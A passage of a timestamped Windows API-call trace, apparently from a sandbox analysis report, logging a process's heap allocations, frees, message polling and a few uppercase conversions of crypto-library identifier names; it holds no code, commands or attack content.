dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0145.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0145.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0145.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0145.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0145.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0145.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0145.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0145.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0145.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0145.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0145.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0145.401] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0145.401] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0145.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0145.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0145.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0145.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0145.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0145.402] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0145.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0145.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0145.402] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0145.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0145.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0145.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0145.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0145.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0145.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0145.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0145.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0145.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0145.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0145.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0145.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0145.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0145.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0145.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0145.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0145.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0145.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0145.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0145.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0145.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0145.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0145.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0145.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0145.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0145.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0145.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0145.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0145.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0145.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0145.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0145.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0145.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0145.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0145.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0145.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0145.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0145.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0145.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0145.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0145.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0145.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0145.404] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0145.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0145.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0145.404] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0145.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0145.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0145.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0145.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0145.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0145.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0145.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0145.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0145.405] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0145.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0145.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0145.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0145.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0145.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0145.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0145.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0145.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0145.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0145.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0145.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0145.405] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0145.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0145.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0145.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0145.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0145.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0145.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0145.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0145.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0145.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0145.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0145.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0145.406] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0145.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0145.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0145.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0145.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0145.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0145.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0145.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0145.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0145.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0145.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0145.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0145.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0145.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0145.407] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0145.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0145.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0145.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0145.407] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0145.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0145.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0145.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0145.407] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0145.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0145.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0145.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0145.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0145.407] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0145.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0145.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0145.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0145.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0145.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0145.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0145.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0145.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0145.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0145.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0145.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0145.408] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0145.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0145.408] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0145.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0145.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0145.408] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0145.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0145.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0145.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0145.408] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0145.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0145.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0145.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.408] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0145.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0145.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0145.409] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0145.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0145.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0145.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0145.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0145.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0145.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0145.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0145.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0145.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0145.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0145.409] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0145.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0145.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0145.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0145.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0145.409] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0145.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0145.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0145.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0145.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0145.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0145.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0145.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0145.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0145.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0145.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0145.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0145.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0145.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0145.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0145.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0145.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0145.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0145.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0145.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0145.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0145.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0145.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0145.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0145.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0145.486] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0145.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0145.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0145.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a10 [0145.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0145.486] PeekMessageW (in: 